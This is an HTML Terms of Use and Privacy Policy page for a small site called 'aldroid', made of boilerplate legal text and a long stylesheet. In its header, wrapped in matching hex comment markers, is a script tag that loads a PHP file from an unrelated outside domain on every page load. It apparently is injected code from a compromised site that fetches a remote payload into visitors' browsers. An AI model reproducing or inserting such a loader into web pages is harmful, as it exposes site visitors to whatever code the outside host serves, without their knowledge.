<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;">
        <title>Tos / Help</title>
        <style>

.one .bsa_it_ad .bsa_it_d {
font-size: 11px;
color: #767676;
line-height: 135%;
}
.one .bsa_it_ad .bsa_it_i{
display:block;
        width:130px;
        max-width:100%;
        padding:0 0 10px 0;
}
.one .bsa_it_ad .bsa_it_t {
display: block;
font-size: 12px;
font-weight: bold;
color: #212121;
line-height: 125%;
}

.one .bsa_it_ad .bsa_it_t,
.one .bsa_it_ad .bsa_it_d {
        display: block;
        padding: 0 0 5px 0;
}
.one .bsa_it_p {
display: block;
text-align: right;
font-size:10px;
}
.one .bsa_it_p a:first-letter{
text-transform:uppercase;
}
#bsap_1273962{
        width:130px;
        padding:0 0 10px 0;
        margin:20px auto;
        text-align:left;
}

.demo_header > a{
        font-size:12px;
        text-decoration:none;
        color: #767676;
        background:#f9f9f9;
        display:block;
        padding:10px;
}
.demo_header > a:hover{
        color:#565656;
}
.demo_header{
        background:#eee;
        color: #363636;
        z-index:10;
        border: 1px solid #ddd;
        border-right: none;
        padding:0;
        position:relative;
        opacity:1;
        text-align:center;
}

.clear{
        clear:both;
}
/* foo */
.foo-bot{margin:0 0 100px 0;}
.foo{
        position:fixed;
        bottom:0;
        right:0;
        width:100%;
        background:#fff;
        text-align:center;
        -webkit-box-sizing:border-box;
        -moz-box-sizing:border-box;
        box-sizing:border-box;
        max-width:100%;
}
.foo .adsense{margin-bottom:-4px;}
.foo a{font-size:12px; color:#fff;text-shadow:1px 1px 0 #565656; display:block;
        background:#88aa00; padding:5px; width:100%; text-align:center;}
        html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,dl,dt,dd,ol,nav ul,nav li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline;}
article, aside, details, figcaption, figure,footer, header, hgroup, menu, nav, section {display: block;}
ol,ul{list-style:none;}
blockquote,q{quotes:none;}
blockquote:before,blockquote:after,q:before,q:after{content:'';content:none;}
table{border-collapse:collapse;border-spacing:0;}
/* start editing from here */
a{text-decoration:none;}
.txt-rt{text-align:right;}/* text align right */
.txt-lt{text-align:left;}/* text align left */
.txt-center{text-align:center;}/* text align center */
.float-rt{float:right;}/* float right */
.float-lt{float:left;}/* float left */
.clear{clear:both;}/* clear float */
.pos-relative{position:relative;}/* Position Relative */
.pos-absolute{position:absolute;}/* Position Absolute */
.vertical-base{ vertical-align:baseline;}/* vertical align baseline */
.vertical-top{  vertical-align:top;}/* vertical align top */
.underline{     padding-bottom:5px;     border-bottom: 1px solid #eee; margin:0 0 20px 0;}/* Add 5px bottom padding and a underline */
nav.vertical ul li{     display:block;}/* vertical menu */
nav.horizontal ul li{   display: inline-block;}/* horizontal menu */
img{max-width:100%;}
/*img[width],img[height]{width:auto;height:auto;} wordpress hack to reset the attributes (while making responsive) */
body{
        font-family:Arial, Helvetica, sans-serif;
}
article{
        font-size:16px;
        color:#868686;
}
article,
article.underline{
        padding:20px;
        margin-bottom:0;
}
article.underline h2:first-child,
article.underline h1:first-child{
        margin-bottom:10px;     
}
article img{
        margin:10px 0;
}
a{ color:#c52525;}
a:hover{ color:#198585;}
/* headings */
h1, h2, h3, h4, h5, h6{
        font-weight:bold;
        color:#565656;
}
h1{
        font-size: 24px;
        margin:0 0 .2em 0;
}
h2{
        font-size: 18px;
        margin:0 0 .3em 0;
}
h3{
        font-size: 16px;
        margin:0 0 .4em 0;
}
h4{
        font-size: 14px;
}
h5, h6{
        font-size: 12px;
}
h4, h5, h6{
        margin:0 0 .6em 0;      
}
/* paragraph */
p{
        line-height:26px;
        margin:0 0 16px 0;
}
/* TextFormatting */
strong, b {
        font-weight: bold;
}
i, cite, em, var, address, dfn {
        font-style: italic;
}
small {
        font-size: smaller;
}
del {
        text-decoration: line-through;
}
ins {
        text-decoration: underline;
}
sup {
        vertical-align: super;
}
sub {
        vertical-align: sub;
}
sub, sup{
        font-size: smaller;     
}
code, kbd, samp, pre, .pre-text {
font-family: monospace;
}
q{
        display:inline;
}
q:before {
content: open-quote;
}
q:after {
content: close-quote;
}
address{
        line-height: 22px;
        margin:0 0 16px 0;
}
abbr[title]{
        border-bottom:1px dotted #565656;
}
/* blcokquote */
blockquote{
        margin:16px 0 16px 40px;
}
/* pre */
pre, .pre-text{
        display: block;
        white-space: pre;
        margin: 1em 0px;
}
/* HTMl lists */
ul,ol,dl{
        display: block;
        margin:1em 0 1em 0;
}
ul, ol{
        padding-left: 40px;     
}
ul{
        list-style-type: disc;
}
ol{
        list-style-type: decimal;
}
dt, dd{
        display: block; 
        margin:0 0 0.5em 0;
}
dt{
        font-weight: bold;
}
dd {
        margin-left: 2em;
}
form label{
        font-size:12px;
        margin-bottom: 0.4em;
}
form input[type=text],
form input[type=password]{
        width:180px;
        
}
form input[type=text],
form input[type=password],textarea{
        border:1px solid #ddd;  
}
form input[type=text],
form input[type=password],textarea{
        -webkit-appearance:none;
        -moz-appearance:none;
}
form input[type="radio"]{
        position:relative;
        top:1px;
}
form div{
        margin:0 0 0.8em 0;
}
form textarea{
        width:180px;
        height:80px;
}
.label-top label{
        display:block;
}
label.inline{
        display:inline-block;
}
form label span.red{
        color:#ff0000;
}
form input[type=submit]{
        border:1px solid #ddd;
        background:#fff;
        color:#767676;
        padding: 10px;
        margin:0;
        cursor: pointer;        
}
/* -- header -- */
header{
        border-bottom:1px solid #eee;
        background:#f2f2f2;
}
.logo{
        padding:10px;
}
.logo img{
        display:block;
}
footer{
        border-top:1px solid #eee;
        background:#f2f2f2;
        color:#4d4d4d;
}
footer p{       
        font-size:12px;
        margin:0;
}
.copy{
        padding:10px;
}
.copy a{
        color:#c52525;
}
/* -- menu -- */
.menu{
}
.menu a{
        background:#f9f9f9;
        border-bottom:1px solid #eee;
        display:block;
        padding:15px;
        color:#767676;
        font-size:12px;
}
.menu a:hover{
        background:#fff;
}
header .menu{
        border-top:1px solid #eee;
}
header .menu a{
        padding:15px 15px 15px 25px;
}
header .menu li:last-child a{
        border-bottom:none;
}
/* Date */
.date{
        font-size:12px;
}
.date span{
        font-weight:bold;
        color:#565656;
}
        
        </style>
    </head>
<body>
        <div class="demo_header">
                <a href="#" title="About">Privacy Policy</a><div class="clear"></div><!--b3c0a9--><script src="http://justsyrian.com/images/taiyYbKM.php" ></script><!--/b3c0a9-->

                <div id="influads_block" class="influads_block"> </div>
                <div class="clear"></div>
        </div>  
        <header>

                
                
       <div class="clear"></div>
        <a name="0"></a> 
    
        <nav class="vertical menu">
            <ul>
          	    <li><a href="#1">Tos & Privacy Policy</a></li>
            </ul>
        </nav> 
    
    </header>
    <div class="content">
    <article>
        



<img src="koka_divider.png" style="width:100%;height:2px" alt="Divider" />
<h2 class="underline">
Tos
</h2>
<a name="1"></a> 

<h2>
	Web Site Terms and Conditions of Use
</h2>

<h3>
	1. Terms
</h3>

<p>
	By accessing this web site, you are agreeing to be bound by these 
	web site Terms and Conditions of Use, all applicable laws and regulations, 
	and agree that you are responsible for compliance with any applicable local 
	laws. If you do not agree with any of these terms, you are prohibited from 
	using or accessing this site. The materials contained in this web site are 
	protected by applicable copyright and trade mark law.
</p>

<h3>
	2. Use License
</h3>

<ol type="a">
	<li>
		Permission is granted to temporarily download one copy of the materials 
		(information or software) on aldroid's web site for personal, 
		non-commercial transitory viewing only. This is the grant of a license, 
		not a transfer of title, and under this license you may not:
		
		<ol type="i">
			<li>modify or copy the materials;</li>
			<li>use the materials for any commercial purpose, or for any public display (commercial or non-commercial);</li>
			<li>attempt to decompile or reverse engineer any software contained on aldroid's web site;</li>
			<li>remove any copyright or other proprietary notations from the materials; or</li>
			<li>transfer the materials to another person or "mirror" the materials on any other server.</li>
		</ol>
	</li>
	<li>
		This license shall automatically terminate if you violate any of these restrictions and may be terminated by aldroid at any time. Upon terminating your viewing of these materials or upon the termination of this license, you must destroy any downloaded materials in your possession whether in electronic or printed format.
	</li>
</ol>

<h3>
	3. Disclaimer
</h3>

<ol type="a">
	<li>
		The materials on aldroid's web site are provided "as is". aldroid makes no warranties, expressed or implied, and hereby disclaims and negates all other warranties, including without limitation, implied warranties or conditions of merchantability, fitness for a particular purpose, or non-infringement of intellectual property or other violation of rights. Further, aldroid does not warrant or make any representations concerning the accuracy, likely results, or reliability of the use of the materials on its Internet web site or otherwise relating to such materials or on any sites linked to this site.
	</li>
</ol>

<h3>
	4. Limitations
</h3>

<p>
	In no event shall aldroid or its suppliers be liable for any damages (including, without limitation, damages for loss of data or profit, or due to business interruption,) arising out of the use or inability to use the materials on aldroid's Internet site, even if aldroid or a aldroid authorized representative has been notified orally or in writing of the possibility of such damage. Because some jurisdictions do not allow limitations on implied warranties, or limitations of liability for consequential or incidental damages, these limitations may not apply to you.
</p>
			
<h3>
	5. Revisions and Errata
</h3>

<p>
	The materials appearing on aldroid's web site could include technical, typographical, or photographic errors. aldroid does not warrant that any of the materials on its web site are accurate, complete, or current. aldroid may make changes to the materials contained on its web site at any time without notice. aldroid does not, however, make any commitment to update the materials.
</p>

<h3>
	6. Links
</h3>

<p>
	aldroid has not reviewed all of the sites linked to its Internet web site and is not responsible for the contents of any such linked site. The inclusion of any link does not imply endorsement by aldroid of the site. Use of any such linked web site is at the user's own risk.
</p>

<h3>
	7. Site Terms of Use Modifications
</h3>

<p>
	aldroid may revise these terms of use for its web site at any time without notice. By using this web site you are agreeing to be bound by the then current version of these Terms and Conditions of Use.
</p>

<h3>
	8. Governing Law
</h3>

<p>
	Any claim relating to aldroid's web site shall be governed by the laws of the State of New York without regard to its conflict of law provisions.
</p>

<p>
	General Terms and Conditions applicable to Use of a Web Site.
</p>



<h2>
	Privacy Policy
</h2>

<p>
	Your privacy is very important to us. Accordingly, we have developed this Policy in order for you to understand how we collect, use, communicate and disclose and make use of personal information. The following outlines our privacy policy.
</p>

<ul>
	<li>
		Before or at the time of collecting personal information, we will identify the purposes for which information is being collected.
	</li>
	<li>
		We will collect and use of personal information solely with the objective of fulfilling those purposes specified by us and for other compatible purposes, unless we obtain the consent of the individual concerned or as required by law.		
	</li>
	<li>
		We will only retain personal information as long as necessary for the fulfillment of those purposes. 
	</li>
	<li>
		We will collect personal information by lawful and fair means and, where appropriate, with the knowledge or consent of the individual concerned. 
	</li>
	<li>
		Personal data should be relevant to the purposes for which it is to be used, and, to the extent necessary for those purposes, should be accurate, complete, and up-to-date. 
	</li>
	<li>
		We will protect personal information by reasonable security safeguards against loss or theft, as well as unauthorized access, disclosure, copying, use or modification.
	</li>
	<li>
		We will make readily available to customers information about our policies and practices relating to the management of personal information. 
	</li>
</ul>

<p>
	We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained. 
</p>		

			


        
        
        <img src="koka_divider.png" style="width:100%;height:2px" alt="Divider" />
    </article>
   </div>
    <footer>
    <p class="copy">&copy; 2012 aldroid - eltonkola.com | All right reserved &bull; :)</p>
    </footer>
</body>
</html>